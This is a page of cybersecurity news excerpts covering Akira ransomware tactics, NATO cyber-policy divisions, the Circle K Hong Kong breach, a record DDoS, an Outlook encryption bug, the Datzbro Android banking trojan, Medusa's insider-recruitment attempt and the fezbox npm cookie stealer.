Once Akira gained access to networks, the attackers moved rapidly, often initiating internal scans within minutes. According to Arctic Wolf, they used Impacket SMB session requests, Remote Desktop Protocol (RDP) logins, and Active Directory enumeration tools like dsquery, SharpShares, and BloodHound to expand their reach. A major focus was on Veeam Backup & Replication servers, where a custom PowerShell script extracted and decrypted stored MSSQL and PostgreSQL credentials. 

To disable endpoint protection, Akira affiliates executed a Bring-Your-Own-Vulnerable-Driver (BYOVD) attack, using Microsoft’s legitimate consent.exe executable to sideload malicious DLLs that deployed vulnerable drivers such as rwdrv.sys and churchill_driver.sys. These drivers were then used to terminate security processes, enabling the ransomware to encrypt systems undetected. 

The report notes that some compromised systems were running SonicOS 7.3.0, the very version recommended by SonicWall to mitigate such attacks. Security experts urge all administrators to reset VPN credentials and review access logs on any devices that previously used vulnerable firmware, as threat actors may still exploit stolen data to infiltrate networks.
Read more »
Threat Intelligence
Cyber Attacks Division NATO Russia-Ukraine War Threat Intelligence

NATO Rift Widens Over Response to Russian Cyber Threats

 

NATO is confronting significant internal divisions on how to handle the intensifying wave of Russian cyberattacks, which expose rifts in alliance strategy and threaten the alliance’s coherence and overall deterrence posture. 

As Russia increasingly targets NATO states’ critical infrastructure, governmental functions, and even military networks, debate has raged within the alliance as to how forcefully to respond, and under what terms, to hostile state-sponsored cyber activities.

Deepening divisions 

A core challenge for NATO is divergent national approaches to what constitutes an act of cyber aggression warranting collective response. Some member states—particularly those along Russia’s borders in the Baltics, as well as Poland—are calling for robust measures, including invoking Article 4 (consultative action in response to threats), and even considering proportional offensive cyber operations against Russian state targets. 

These nations see repeated Russian provocations, from cyber to airspace incursions, as clear tests of alliance resolve that demand a stiff and highly visible response.

However, other countries, such as France and Germany, worry about the risks of escalation and advocate a more cautious, defensive posture, preferring extensive evidence gathering, attribution efforts, and diplomatic engagement before considering retaliatory action. 

They argue frequent consultations or aggressive stances could water down NATO’s deterrent signal or trigger dangerous unintended escalation. This split produces tactical uncertainty and delays, potentially emboldening adversaries and hampering a unified alliance front.

Policy stalemate and its consequences

These diverging approaches are mirrored in ongoing arguments about when and how to use NATO’s cyber capabilities offensively versus limiting the alliance to defensive postures or coordinated resilience initiatives. 

While some strategists press for disruptive cyber operations or overt information warfare campaigns targeting Russia, consensus is lacking due to legal concerns, worries about thresholds for collective defense, and varying levels of national cyber capacity and risk appetite.

Strategic implications

Analysts warn that Russia’s overt cyber and hybrid threats are, in part, designed to exploit and widen these strategic rifts, stymying meaningful joint response and putting both NATO's credibility and European security at risk. Persistent internal divisions leave NATO vulnerable, raising pressure for the alliance to develop a clearer, more decisive policy on cyber deterrence and response.
Read more »
Cyber Attacks
Circle K cyberattack Hong Kong Circle K data breach Circle K Hong Kong payment outage Cyber Attacks

Circle K Confirms Cyberattack in Hong Kong, Services Still Disrupted

 

Circle K has confirmed that its Hong Kong operations were hit by a cyberattack, a week after the convenience store chain suspended most electronic payment services. The company has apologized to affected customers and assured the public that the incident is now “under control” while investigations continue.

The disruption began by affecting electronic payments across 400 stores citywide, except transactions made through the Octopus card. The following day, the company revealed it was facing network problems and did not rule out a cyberattack.  A spokesperson confirmed it was indeed a network attack, but did not clarify whether customer data had been compromised.

Despite all stores remaining open, several key services remain suspended, including parcel collection, e-wallet top-ups, bill payments, and the loyalty rewards program. Octopus payments and cash transactions are still being accepted. Circle K has also notified law enforcement authorities and engaged cybersecurity experts to assist with the recovery.

Customers have voiced frustration on social media over the company’s slow response, asking for clearer updates and alternative arrangements. Some requested temporary manual solutions for parcel collection and clarity on whether loyalty program stamps and rewards would remain valid.

The Office of the Privacy Commissioner for Personal Data (PCPD) confirmed it received a data breach notification on September 23 from Couche-Tard HK Limited, Circle K’s parent company. The PCPD has launched a compliance check to investigate potential risks to personal data.

Cybersecurity expert Francis Fong Po-kiu suggested that Circle K may have fallen victim to a ransomware attack, in which hackers infiltrate systems, encrypt data, and demand payment for a decryption key. “They might be working to find the loophole, to find out whether something went wrong in the server or on the retail front,” he said, warning that full recovery could take months or even years. He added that while it was uncertain if customer data had been leaked, loyalty program details such as names, emails, and phone numbers could be at risk.
Read more »
US Secret Service rogue network
22.2Tbps cyberattack Cyber Attacks DDOS Attack SIM Card Operation US Secret Service rogue network

World’s Largest 22.2Tbps DDoS Attack and Rogue SIM Network Busted by US Secret Service

 

Earlier this month, reports highlighted a massive 11.5Tbps DDoS attack — the largest on record at the time. However, that figure was quickly overshadowed this week when a new distributed denial-of-service strike reached an unprecedented 22.2Tbps, transmitting 10.6 billion packets per second. The assault, although lasting just 40 seconds, showcased the immense scale and power of today’s botnets. 

Experts warn that as these malicious networks expand, future DDoS attacks will likely grow even more destructive, targeting vulnerable companies and platforms worldwide.

In another alarming case, the US Secret Service dismantled a rogue cellular network made up of more than 100,000 SIM cards. The network, which was spread across several physical sites, was strategically positioned ahead of the UN General Assembly in New York City.

 Investigators revealed the operation aimed to carry out attacks against diplomats and officials, including DDoS campaigns, deepfaked calls, and even “swatting” attempts — where false bomb or violence threats are reported to law enforcement to provoke an armed response. Doxxing, exposing private personal details, was also among the threats.

These incidents serve as stark reminders of how critical it is to safeguard personal data. Yet, protecting your information is increasingly challenging in a digital economy where data brokers profit from collecting and selling detailed profiles. 

Even everyday apps, from Duolingo to Candy Crush, harvest user data. On the positive side, individuals can take action by requesting data deletion directly from brokers or by using specialized personal data removal services.
Read more »
Microsoft Outlook security
Bug Fixes Cyber Attacks Microsoft Microsoft Outlook security

Microsoft Probes Outlook Bug Blocking Encrypted Emails Across Tenants

 

Microsoft is investigating a newly identified issue that prevents users of the classic Outlook client from opening encrypted emails sent by other organizations. 

The company confirmed the problem in a recently updated support document, noting that the bug affects customers across all Office release channels. 

According to Microsoft, users attempting to access such emails may encounter the error message: “Configuring your computer for Information Rights Management.” The glitch impacts OMEv2 (Office Message Encryption version 2) messages when sent across different tenants, creating disruptions for enterprise communication. 

Temporary workaround provided 

While the root cause is still under review, Microsoft has issued a temporary fix. Impacted organizations can either exclude external users from Conditional Access policies or enable cross-tenant settings that allow authentication tokens to be trusted between Entra tenants. 

The company recommends the second option as the simpler solution. Administrators can enable cross-tenant access by navigating to the “Inbound access settings – Default settings” page in the Microsoft Entra admin center, selecting “Trust settings,” and then enabling “Trust multifactor authentication from Microsoft Entra tenants.” 

Microsoft cautioned, however, that this workaround only ensures encrypted emails sent from an organization can be opened by others. 

To access encrypted messages received from a different tenant, the sending organization must also apply the same configuration. Ongoing investigation The Outlook and Purview teams are currently working on a permanent resolution. 

Microsoft has assured customers that updates will be shared once more information is available. 

This is the latest in a string of Outlook-related bugs addressed by Redmond (a global headquarter of Microsoft) this year. 

In June, the company resolved a crash affecting the classic Outlook client when opening or composing emails. Later, in August, it mitigated an Exchange Online issue that blocked mobile users relying on Hybrid Modern Authentication. 

With encrypted communications becoming central to enterprise security, a swift resolution will be crucial to ensure seamless cross-tenant collaboration.
Read more »
Fake Apps
Android Android Banking Trojan Android Trojans Banking Trojan Credential Theft Cyber Attacks Fake Apps

Datzbro Android Banking Trojan Targets Seniors With Device-Takeover Attacks

 

Researchers have uncovered a previously undocumented Android banking trojan, dubbed Datzbro, that is being used in device-takeover campaigns aimed squarely at older adults. ThreatFabric, a Dutch mobile security firm, first tied the activity to a social-engineering network in August 2025 after reports emerged of Facebook groups in Australia advertising “active senior trips” that were in fact recruitment channels for the scam. The operation has been observed in multiple countries, including Singapore, Malaysia, Canada, South Africa and the U.K., and relies on community-focused messaging to build trust before delivering malware. 

The attackers create convincing Facebook groups and AI-generated posts promoting local events for seniors. When a target shows interest, operators move the conversation to Facebook Messenger or WhatsApp and push a link to download a so-called community app—usually an APK hosted on a fraudulent domain. Those sites promise event registration and networking features but deliver an installer that either installs Datzbro directly or drops a secondary loader built with an APK-binding service called Zombinder, which helps bypass protections introduced in Android 13 and later. Some evidence suggests the fraudsters are preparing iOS TestFlight lures as well, indicating cross-platform ambitions. 

Analysts have cataloged multiple malicious app package names used to distribute the trojan, from innocuous-sounding “Senior Group” and “Lively Years” to variants masquerading as popular Chinese apps or tools. Once installed, Datzbro grants itself extensive permissions and weaponizes Android accessibility services to perform actions on behalf of the attacker. It can record audio, capture photos, harvest files, log keystrokes and overlay semi-transparent screens to hide malicious activity from victims. A distinctive feature is its “schematic remote control” mode, which reports screen layout, element positions and content back to operators so they can reconstruct interfaces remotely and direct the device as if they were looking over the victim’s shoulder. 

The trojan also filters accessibility event logs for bank or wallet package names and scans for text resembling PINs, passwords or transaction codes. If it finds credentials in cookies or other storage, Datzbro exfiltrates them to the attackers’ back end; it can even steal lock-screen PINs and compromise popular Chinese payment apps such as Alipay and WeChat. ThreatFabric noted Chinese debug strings and a Chinese-language desktop command-and-control application tied to the campaign, suggesting the authors are Chinese-speaking. A compiled C2 client reportedly leaked to public malware repositories, which may accelerate wider abuse by other criminals. 

Datzbro’s discovery comes amid broader mobile-banking malware activity. IBM X-Force has described a related AntiDot campaign called PhantomCall that similarly abuses Android features and sideloaded droppers to bypass modern OS protections, while PRODAFT has documented MaaS-style offerings for actors aiming at global banks. Together, these trends reflect a sustained move toward targeted social engineering that exploits community trust to coax vulnerable users into installing powerful remote-control malware. 

The rapid evolution of these threats underscores the need for heightened public awareness—especially among seniors—tighter app-distribution controls, and stronger defenses around accessibility permissions and sideloaded software.
Read more »
Syn
BBC Reporter Cyber Attacks Medusa Ransomware Syn

Medusa Ransomware Gang Offers BBC Reporter Millions for Inside Hack Access

 

A ransomware operation claiming affiliation with the Medusa gang attempted to recruit BBC cybersecurity correspondent Joe Tidy as an insider threat, offering him substantial financial incentives in exchange for access to the broadcaster's systems. 

The threat actor, using the alias "Syndicate" (later shortened to "Syn"), contacted Tidy in July via the encrypted messaging app Signal, proposing an arrangement that would give him a percentage of the ransom proceeds. The initial proposition involved offering Tidy 15% of any ransom payment if he provided access to his work laptop and BBC systems. 

The cybercriminals planned to infiltrate the organization's network, exfiltrate sensitive data, and demand payment in cryptocurrency while threatening to release stolen information. As negotiations continued, Syn increased the offer to 25%, suggesting the total ransom demand could reach tens of millions of dollars and claiming Tidy "wouldn't need to work ever again".

To establish credibility, the threat actor offered 0.5 Bitcoin (approximately $55,000) as an upfront trust payment through escrow on a hacker forum. Syn referenced previous successful insider recruitment operations, citing cases involving a UK healthcare company and a US emergency services provider, suggesting such collaborations were common in their operations.

The Medusa ransomware operation has operated since January 2021 and evolved from a closed operation to a ransomware-as-a-service model with affiliates. According to a March report from CISA, the gang has compromised over 300 critical infrastructure organizations in the United States. The operation's core developers recruit initial access brokers through cybercrime forums and darknet marketplaces while maintaining central control over ransom negotiations.

Tidy, who reports on cybersecurity topics, believes the attackers likely mistook him for a technical employee with elevated system privileges rather than a journalist. After consulting with BBC editors, he engaged with the threat actor to gather intelligence on their methods. When Tidy delayed responding to their demands, the criminals launched an MFA bombing attack, flooding his phone with two-factor authentication requests in an attempt to force approval of a malicious login.

The journalist promptly contacted BBC's information security team and was disconnected from the organization's infrastructure as a precautionary measure. Following several days of silence from Tidy, the alleged Medusa representative deleted their Signal account.
Read more »
QR code scams
Cookie Cookies Exploit Cyber Attacks Infostealer Malware Malicious Package Malware Attack Malwares QR code QR code scams

Fezbox npm Package Uses QR Codes to Deliver Cookie-Stealing Malware

 

A malicious npm package called fezbox was recently uncovered using an unusual trick: it pulls a dense QR code image from the attacker’s server and decodes that barcode to deliver a second-stage payload that steals browser cookies and credentials. Published to the npm registry and posing as a harmless utility library, the package relied on steganography and evasion techniques to hide its true purpose. By the time registry administrators removed it, fezbox had recorded hundreds of installs. 

Analysis by the Socket Threat Research Team shows the core malicious logic lives in the package’s distributed file, where minified code waits for production-like conditions before acting. That staged behavior is deliberate: the malware checks for development environments and other telltale signs of sandboxing, remaining dormant during analysis to avoid detection. After a short delay, the code reconstructs a reversed string that resolves to a Cloudinary URL hosting a JPG. That image contains an unusually dense QR code, not intended for human scanners but encoded with obfuscated instructions the package can parse automatically. 

Storing the image URL in reverse is a simple but effective evasion move. By reversing the string, the attackers reduced the chance that static scanners flag a plain http(s) link embedded in the code. Once the package decodes the QR, the embedded payload extracts document.cookie values and looks for username and password entries. If both items are present, the stolen credentials are sent via HTTPS POST to a command-and-control endpoint under the attacker’s control; if not, the package quietly exits. In short, fezbox converts an image fetch into a covert channel for credential exfiltration that looks like routine media traffic to many network monitoring tools. 

This technique represents an evolution from earlier image-based steganography because it uses the QR barcode itself as the delivery vessel for parseable code rather than hiding data in image metadata or color channels. That makes the abuse harder to spot: a proxy or IDS that permits image downloads will often treat the fetch as normal content, while the malicious decoding and execution occur locally in the runtime environment. The QR’s data density intentionally defeats casual scanning by phone, so human users will not notice anything suspicious even if they try to inspect the image. 

The fezbox incident underscores how open-source ecosystems can be abused via supply-chain vectors that combine code trojanization with clever obfuscation. Attackers can publish seemingly useful packages, wait for installs, and then activate hidden logic that reaches out for symbolic resources such as images or configuration files. Defenders should monitor package provenance, scan installed dependencies for unusual network calls, and enforce least-privilege policies that limit what third-party modules can access at runtime. Registry maintainers and developers alike must also treat media-only traffic with healthy suspicion, since seemingly innocuous image downloads can bootstrap highly targeted exfiltration channels. 

As attacks become more creative, detection approaches must move beyond signature checks and look for behaviors such as unexpected decodes, remote fetches of unusual image content, and suspicious POSTs to new domains. The fezbox campaign is a reminder that any medium — even a QR code embedded in a JPG — can be repurposed as a covert communications channel when code running on a developer’s machine is allowed to fetch and interpret it.
Read more »
Subscribe to: Comments (Atom)